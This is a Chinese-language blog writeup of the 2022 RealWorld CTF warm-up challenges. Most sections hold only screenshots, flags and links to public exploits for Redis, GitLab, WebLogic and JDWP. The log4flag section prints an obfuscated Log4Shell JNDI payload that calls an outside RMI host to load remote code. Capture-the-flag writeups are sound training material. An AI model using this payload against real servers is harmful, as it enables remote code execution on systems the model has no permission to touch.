2022 RealWorld CTF体验赛Writeup

原创

末初mochu7 2023-06-19 21:50:05 博主文章分类：CTF_WEB_Writeup ©著作权

文章标签 RealWorldCTF Database github Java 文章分类 代码人生

©著作权归作者所有：来自51CTO博客作者末初mochu7的原创作品，请联系作者获取转载授权，否则将追究法律责任

文章目录

Digital Souvenir
log4flag
Be-a-Database-Hacker
the Secrets of Memory
baby flaglab
Flag Console
Be-a-Database-Hacker 2
Java Remote Debugger

Digital Souvenir

2022 RealWorld CTF体验赛Writeup_github

2022 RealWorld CTF体验赛Writeup_github_02

rwctf{RealWorldIsAwesome}

log4flag

2022 RealWorld CTF体验赛Writeup_github_03

有一些正则过滤

2022 RealWorld CTF体验赛Writeup_RealWorldCTF_04

网上bypass方法很多，随便找一个就行

${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}

2022 RealWorld CTF体验赛Writeup_github_05

Refer：https://cloud.tencent.com/developer/article/1921530

2022 RealWorld CTF体验赛Writeup_github_06

2022 RealWorld CTF体验赛Writeup_Database_07

Be-a-Database-Hacker

2022 RealWorld CTF体验赛Writeup_github_08

redis未授权访问

2022 RealWorld CTF体验赛Writeup_github_09

Refer: https://github.com/n0b0dyCN/redis-rogue-server

2022 RealWorld CTF体验赛Writeup_Database_10

2022 RealWorld CTF体验赛Writeup_github_11

the Secrets of Memory

2022 RealWorld CTF体验赛Writeup_RealWorldCTF_12

2022 RealWorld CTF体验赛Writeup_github_13

Refer：https://landgrey.me/blog/16/

2022 RealWorld CTF体验赛Writeup_Java_14

baby flaglab

2022 RealWorld CTF体验赛Writeup_Database_15

Refer：https://github.com/Al1ex/CVE-2021-22205

2022 RealWorld CTF体验赛Writeup_github_16

2022 RealWorld CTF体验赛Writeup_Database_17

Flag Console

2022 RealWorld CTF体验赛Writeup_Database_18

2022 RealWorld CTF体验赛Writeup_RealWorldCTF_19

Refer：https://github.com/backlion/CVE-2020-14882_ALL

2022 RealWorld CTF体验赛Writeup_Database_20

Be-a-Database-Hacker 2

2022 RealWorld CTF体验赛Writeup_Database_21

2022 RealWorld CTF体验赛Writeup_RealWorldCTF_22

2022 RealWorld CTF体验赛Writeup_Database_23

Java Remote Debugger

2022 RealWorld CTF体验赛Writeup_github_24

Test.java

import java.lang.Thread;
public class Test {
  public static void main (String[] args) throws Exception{
    int i = 0;
    while (1 == 1) {
      Thread.sleep(1000);
      System.out.println("" + i);
      i += 1;
    }
  }
}

Java Debug Wire Protocol (JDWP) - Remote Code Execution

Refer：https://security.tencent.com/index.php/blog/msg/137

2022 RealWorld CTF体验赛Writeup_RealWorldCTF_25

2022 RealWorld CTF体验赛Writeup_Database_26

上一篇：About me & Friendship links

下一篇：“东华杯”2021年大学生网络安全邀请赛暨第七届上海市大学生网络安全大赛线上赛MISC-Writeup

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯